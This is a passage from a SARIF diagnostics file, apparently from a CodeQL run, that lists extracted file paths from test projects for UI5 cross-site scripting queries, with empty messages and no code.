} - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 240 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", - "uriBaseId" : "%SRCROOT%", - "index" : 241 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 244 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 245 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", - "uriBaseId" : "%SRCROOT%", - "index" : 246 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", - "uriBaseId" : "%SRCROOT%", - "index" : 247 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 248 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 249 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 250 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", - "uriBaseId" : "%SRCROOT%", - "index" : 251 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 252 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 253 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", - "uriBaseId" : "%SRCROOT%", - "index" : 254 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 255 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 256 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", - "uriBaseId" : "%SRCROOT%", - "index" : 257 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 258 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 259 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 260 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", - "uriBaseId" : "%SRCROOT%", - "index" : 261 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 262 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 263 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 264 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 265 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 267 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 268 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 269 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 270 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 272 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 273 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 274 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 276 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 277 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 278 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 279 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 281 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 282 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 283 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 285 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 286 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 287 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 288 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 290 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 291 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 292 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 293 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 294 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 295 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 296 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 297 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 298 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 299 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 300 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 301 - } - } - } ], - 